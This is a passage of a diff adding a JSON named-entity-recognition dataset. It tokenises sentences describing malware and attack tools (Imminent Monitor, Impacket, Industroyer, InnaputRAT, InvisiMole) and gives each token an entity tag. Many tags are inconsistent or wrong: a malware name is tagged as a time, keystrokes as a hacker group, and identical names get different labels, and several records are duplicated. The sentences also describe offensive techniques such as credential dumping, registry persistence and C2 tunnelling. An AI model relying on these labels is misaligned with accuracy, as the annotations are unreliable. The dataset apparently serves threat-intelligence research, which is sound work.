+ "attachments", + "to", + "avoid", + "detection", + "from", + "email", + "gateways;", + "the", + "debugger", + "also", + "encrypts", + "information", + "before", + "sending", + "to", + "the", + "C2." + ], + "ner_tags": [ + "B-Time", + "B-SecTeam", + "O", + "O", + "O", + "B-Way", + "B-SecTeam", + "O", + "O", + "O", + "O", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "\"Process", + "Watcher\"", + "feature", + "to", + "monitor", + "processes", + "in", + "case", + "the", + "client", + "ever", + "crashes", + "or", + "gets", + "closed." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "module", + "for", + "performing", + "remote", + "desktop", + "access." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "the", + "capability", + "to", + "run", + "a", + "cryptocurrency", + "miner", + "on", + "the", + "victim", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Imminent", + "Monitor", + "has", + "a", + "remote", + "webcam", + "monitoring", + "capability." + ], + "ner_tags": [ + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Impacket", + "modules", + "like", + "GetUserSPNs", + "can", + "be", + "used", + "to", + "get", + "Service", + "Principal", + "Names", + "(SPNs)", + "for", + "user", + "accounts.", + "The", + "output", + "is", + "formatted", + "to", + "be", + "compatible", + "with", + "cracking", + "tools", + "like", + "John", + "the", + "Ripper", + "and", + "Hashcat." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Tool", + "B-Way", + "B-Way", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Impacket", + "modules", + "like", + "ntlmrelayx", + "and", + "smbrelayx", + "can", + "be", + "used", + "in", + "conjunction", + "with", + "Network", + "Sniffing", + "and", + "LLMNR/NBT-NS", + "Poisoning", + "and", + "SMB", + "Relay", + "to", + "gather", + "NetNTLM", + "credentials", + "for", + "Brute", + "Force", + "or", + "relay", + "attacks", + "that", + "can", + "gain", + "code", + "execution." + ], + "ner_tags": [ + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Way", + "B-SecTeam", + "O", + "B-Way", + "B-Tool", + "O", + "B-Way", + "B-Tool", + "O", + "B-Purp", + "B-Way", + "B-Features", + "O", + "B-Idus", + "B-HackOrg", + "O", + "I-OffAct", + "I-OffAct", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SecretsDump", + "and", + "Mimikatz", + "modules", + "within", + "Impacket", + "can", + "perform", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SecretsDump", + "and", + "Mimikatz", + "modules", + "within", + "Impacket", + "can", + "perform", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "SecretsDump", + "and", + "Mimikatz", + "modules", + "within", + "Impacket", + "can", + "perform", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information", + "from", + "NTDS.dit." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Impacket", + "can", + "be", + "used", + "to", + "sniff", + "network", + "traffic", + "via", + "an", + "interface", + "or", + "raw", + "socket." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "SecretsDump", + "and", + "Mimikatz", + "modules", + "within", + "Impacket", + "can", + "perform", + "credential", + "dumping", + "to", + "obtain", + "account", + "and", + "password", + "information." + ], + "ner_tags": [ + "B-Way", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-Features" + ] + }, + { + "tokens": [ + "Impacket", + "contains", + "various", + "modules", + "emulating", + "other", + "service", + "execution", + "tools", + "such", + "as", + "PsExec." + ], + "ner_tags": [ + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Impacket's", + "wmiexec", + "module", + "can", + "be", + "used", + "to", + "execute", + "commands", + "through", + "WMI." + ], + "ner_tags": [ + "O", + "B-SamFile", + "I-SamFile", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Industroyer", + "uses", + "a", + "custom", + "DoS", + "tool", + "that", + "leverages", + "CVE-2015-5374", + "and", + "targets", + "hardcoded", + "IP", + "addresses", + "of", + "Siemens", + "SIPROTEC", + "devices." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "has", + "used", + "a", + "Trojanized", + "version", + "of", + "the", + "Windows", + "Notepad", + "application", + "for", + "an", + "additional", + "backdoor", + "persistence", + "mechanism." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer’s", + "data", + "wiper", + "module", + "clears", + "registry", + "keys", + "and", + "overwrites", + "both", + "ICS", + "configuration", + "and", + "Windows", + "files." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "decrypts", + "code", + "to", + "connect", + "to", + "a", + "remote", + "C2", + "server." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "sends", + "information", + "about", + "hardware", + "profiles", + "and", + "previously-received", + "commands", + "back", + "to", + "the", + "C2", + "server", + "in", + "a", + "POST-request." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer’s", + "data", + "wiper", + "component", + "enumerates", + "specific", + "files", + "on", + "all", + "the", + "Windows", + "drives." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "downloads", + "a", + "shellcode", + "payload", + "from", + "a", + "remote", + "C2", + "server", + "and", + "loads", + "it", + "into", + "memory." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "used", + "Tor", + "nodes", + "for", + "C2." + ], + "ner_tags": [ + "B-Idus", + "O", + "I-Tool", + "I-Tool", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "uses", + "a", + "custom", + "port", + "scanner", + "to", + "map", + "out", + "a", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "uses", + "heavily", + "obfuscated", + "code", + "in", + "its", + "Windows", + "Notepad", + "backdoor." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "attempts", + "to", + "perform", + "an", + "HTTP", + "CONNECT", + "via", + "an", + "internal", + "proxy", + "to", + "establish", + "a", + "tunnel." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "has", + "a", + "data", + "wiper", + "component", + "that", + "enumerates", + "keys", + "in", + "the", + "Registry", + "<code>HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services</code>." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "Industroyer", + "can", + "enumerate", + "remote", + "computers", + "in", + "the", + "compromised", + "network." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer’s", + "data", + "wiper", + "module", + "writes", + "zeros", + "into", + "the", + "registry", + "keys", + "in", + "<code>SYSTEM\\CurrentControlSet\\Services</code>", + "to", + "render", + "a", + "system", + "inoperable." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "collects", + "the", + "victim", + "machine’s", + "Windows", + "GUID." + ], + "ner_tags": [ + "B-Idus", + "B-Features", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer’s", + "61850", + "payload", + "component", + "enumerates", + "connected", + "network", + "adapters", + "and", + "their", + "corresponding", + "IP", + "addresses." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer", + "can", + "use", + "supplied", + "user", + "credentials", + "to", + "execute", + "processes", + "and", + "stop", + "services." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Industroyer’s", + "main", + "backdoor", + "connected", + "to", + "a", + "remote", + "C2", + "server", + "using", + "HTTPS." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "Industroyer", + "can", + "use", + "an", + "arbitrary", + "system", + "service", + "to", + "load", + "at", + "system", + "boot", + "for", + "persistence", + "and", + "replaces", + "the", + "ImagePath", + "registry", + "value", + "of", + "a", + "Windows", + "service", + "with", + "a", + "new", + "backdoor", + "binary." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Features", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Industroyer2", + "has", + "the", + "ability", + "to", + "cyclically", + "enumerate", + "running", + "processes", + "such", + "as", + "PServiceControl.exe,", + "PService_PDD.exe,", + "and", + "other", + "targets", + "supplied", + "through", + "a", + "hardcoded", + "configuration." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InnaputRAT", + "has", + "a", + "command", + "to", + "delete", + "files." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "O" + ] + }, + { + "tokens": [ + "InnaputRAT", + "enumerates", + "directories", + "and", + "obtains", + "file", + "attributes", + "on", + "a", + "system." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InnaputRAT", + "variants", + "have", + "attempted", + "to", + "appear", + "legitimate", + "by", + "adding", + "a", + "new", + "service", + "named", + "OfficeUpdateService." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "InnaputRAT", + "variants", + "have", + "attempted", + "to", + "appear", + "legitimate", + "by", + "using", + "the", + "file", + "names", + "SafeApp.exe", + "and", + "NeutralApp.exe." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "B-SamFile" + ] + }, + { + "tokens": [ + "InnaputRAT", + "uses", + "the", + "API", + "call", + "ShellExecuteW", + "for", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O" + ] + }, + { + "tokens": [ + "InnaputRAT", + "uses", + "an", + "8-byte", + "XOR", + "key", + "to", + "obfuscate", + "API", + "names", + "and", + "other", + "strings", + "contained", + "in", + "the", + "payload." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "InnaputRAT", + "variants", + "establish", + "persistence", + "by", + "modifying", + "the", + "Registry", + "key", + "<code>HKU\\<SID>\\Software\\Microsoft\\Windows\\CurrentVersion\\Run:%appdata%\\NeutralApp\\NeutralApp.exe</code>." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "B-Way" + ] + }, + { + "tokens": [ + "InnaputRAT", + "gathers", + "volume", + "drive", + "information", + "and", + "system", + "information." + ], + "ner_tags": [ + "B-SamFile", + "B-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InnaputRAT", + "launches", + "a", + "shell", + "to", + "execute", + "commands", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "Some", + "InnaputRAT", + "variants", + "create", + "a", + "new", + "Windows", + "service", + "to", + "establish", + "persistence." + ], + "ner_tags": [ + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Tool", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "enumerate", + "windows", + "and", + "child", + "windows", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "uses", + "a", + "variation", + "of", + "the", + "XOR", + "cipher", + "to", + "encrypt", + "files", + "before", + "exfiltration." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "zlib", + "to", + "compress", + "and", + "decompress", + "data." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "uses", + "WinRAR", + "to", + "compress", + "data", + "that", + "is", + "intended", + "to", + "be", + "exfiltrated." + ], + "ner_tags": [ + "B-Idus", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "inject", + "its", + "code", + "into", + "a", + "trusted", + "process", + "via", + "the", + "APC", + "queue." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Way", + "I-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "record", + "sound", + "using", + "input", + "audio", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "sort", + "and", + "collect", + "specific", + "documents", + "as", + "well", + "as", + "generate", + "a", + "list", + "of", + "all", + "files", + "on", + "a", + "newly", + "inserted", + "drive", + "and", + "store", + "them", + "in", + "an", + "encrypted", + "file." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "I-Features", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "fileless", + "UAC", + "bypass", + "and", + "create", + "an", + "elevated", + "COM", + "object", + "to", + "escalate", + "privileges." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "the", + "<code>ITaskService</code>,", + "<code>ITaskDefinition</code>", + "and", + "<code>ITaskSettings</code>", + "COM", + "interfaces", + "to", + "schedule", + "a", + "task." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "register", + "itself", + "for", + "execution", + "and", + "persistence", + "via", + "the", + "Control", + "Panel." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "be", + "launched", + "by", + "using", + "DLL", + "search", + "order", + "hijacking", + "in", + "which", + "the", + "wrapper", + "DLL", + "is", + "placed", + "in", + "the", + "same", + "folder", + "as", + "explorer.exe", + "and", + "loaded", + "during", + "startup", + "into", + "the", + "Windows", + "Explorer", + "process", + "instead", + "of", + "the", + "legitimate", + "library." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "a", + "custom", + "implementation", + "of", + "DNS", + "tunneling", + "to", + "embed", + "C2", + "communications", + "in", + "DNS", + "requests", + "and", + "replies." + ], + "ner_tags": [ + "B-Idus", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "collect", + "data", + "from", + "the", + "system,", + "and", + "can", + "monitor", + "changes", + "in", + "specified", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "collect", + "jpeg", + "files", + "from", + "connected", + "MTP", + "devices." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "decrypt,", + "unpack", + "and", + "load", + "a", + "DLL", + "from", + "its", + "resources,", + "or", + "from", + "blobs", + "encrypted", + "with", + "Data", + "Protection", + "API,", + "two-key", + "triple", + "DES,", + "and", + "variations", + "of", + "the", + "XOR", + "cipher." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "a", + "command", + "to", + "disable", + "routing", + "and", + "the", + "Firewall", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "Data", + "Protection", + "API", + "to", + "encrypt", + "its", + "components", + "on", + "the", + "victim’s", + "computer,", + "to", + "evade", + "detection,", + "and", + "to", + "make", + "sure", + "the", + "payload", + "can", + "only", + "be", + "decrypted", + "and", + "loaded", + "on", + "one", + "specific", + "compromised", + "computer." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Tool", + "I-Tool", + "I-Tool", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "installed", + "legitimate", + "but", + "vulnerable", + "Total", + "Video", + "Player", + "software", + "and", + "wdigest.dll", + "library", + "drivers", + "on", + "compromised", + "hosts", + "to", + "exploit", + "stack", + "overflow", + "and", + "input", + "validation", + "vulnerabilities", + "for", + "code", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "exploited", + "CVE-2007-5633", + "vulnerability", + "in", + "the", + "speedfan.sys", + "driver", + "to", + "obtain", + "kernel", + "mode", + "privileges." + ], + "ner_tags": [ + "B-Org", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "spread", + "within", + "a", + "network", + "via", + "the", + "BlueKeep", + "(CVE-2019-0708)", + "and", + "EternalBlue", + "(CVE-2017-0144)", + "vulnerabilities", + "in", + "RDP", + "and", + "SMB", + "respectively." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Way", + "B-Features", + "O", + "B-Way", + "B-Features", + "O", + "O", + "B-Way", + "O", + "B-Way", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "InvisiMole", + "can", + "identify", + "proxy", + "servers", + "used", + "by", + "the", + "victim", + "and", + "use", + "them", + "for", + "C2", + "communication." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "been", + "configured", + "with", + "several", + "servers", + "available", + "for", + "alternate", + "C2", + "communications." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "deleted", + "files", + "and", + "directories", + "including", + "XML", + "and", + "files", + "successfully", + "uploaded", + "to", + "C2", + "servers." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "list", + "information", + "about", + "files", + "in", + "a", + "directory", + "and", + "recently", + "opened", + "or", + "used", + "documents.", + "InvisiMole", + "can", + "also", + "search", + "for", + "specific", + "files", + "by", + "supplied", + "file", + "mask." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "create", + "hidden", + "system", + "directories." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "I-Features", + "I-Features", + "B-HackOrg" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "executed", + "legitimate", + "tools", + "in", + "hidden", + "windows." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "undergone", + "regular", + "technical", + "improvements", + "in", + "an", + "attempt", + "to", + "evade", + "detection." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "upload", + "files", + "to", + "the", + "victim's", + "machine", + "for", + "operations." + ], + "ner_tags": [ + "B-SamFile", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "can", + "remove", + "all", + "system", + "restore", + "points." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "I-Features", + "I-Features", + "O", + "O", + "B-HackOrg" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "function", + "as", + "a", + "proxy", + "to", + "create", + "a", + "server", + "that", + "relays", + "communication", + "between", + "the", + "client", + "and", + "C&C", + "server,", + "or", + "between", + "two", + "clients." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "B-Features", + "I-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "use", + "a", + "JavaScript", + "file", + "as", + "part", + "of", + "its", + "execution", + "chain." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "B-Way", + "B-Tool", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "capture", + "keystrokes", + "on", + "a", + "compromised", + "host." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "used", + "ListPlanting", + "to", + "inject", + "code", + "into", + "a", + "trusted", + "process." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "B-Way", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "a", + "command", + "to", + "list", + "account", + "information", + "on", + "the", + "victim’s", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "determines", + "a", + "working", + "directory", + "where", + "it", + "stores", + "all", + "the", + "gathered", + "data", + "about", + "the", + "compromised", + "machine." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", + "deliver", + "trojanized", + "versions", + "of", + "software", + "and", + "documents,", + "relying", + "on", + "user", + "execution." + ], + "ner_tags": [ + "B-SamFile", + "O", + "I-Features", + "B-HackOrg", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "attempted", + "to", + "disguise", + "itself", + "by", + "registering", + "under", + "a", + "seemingly", + "legitimate", + "service", + "name." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "disguised", + "its", + "droppers", + "as", + "legitimate", + "software", + "or", + "documents,", + "matching", + "their", + "original", + "names", + "and", + "locations,", + "and", + "saved", + "its", + "files", + "as", + "mpr.dll", + "in", + "the", + "Windows", + "folder." + ], + "ner_tags": [ + "B-Time", + "O", + "O", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "O", + "B-SamFile", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "has", + "a", + "command", + "to", + "create,", + "set,", + "copy,", + "or", + "delete", + "a", + "specified", + "Registry", + "key", + "or", + "value." + ], + "ner_tags": [ + "B-SamFile", + "O", + "O", + "O", + "O", + "B-Features", + "B-Features", + "B-Features", + "O", + "B-Features", + "O", + "O", + "O", + "O", + "O", + "O" + ] + }, + { + "tokens": [ + "InvisiMole", + "can", 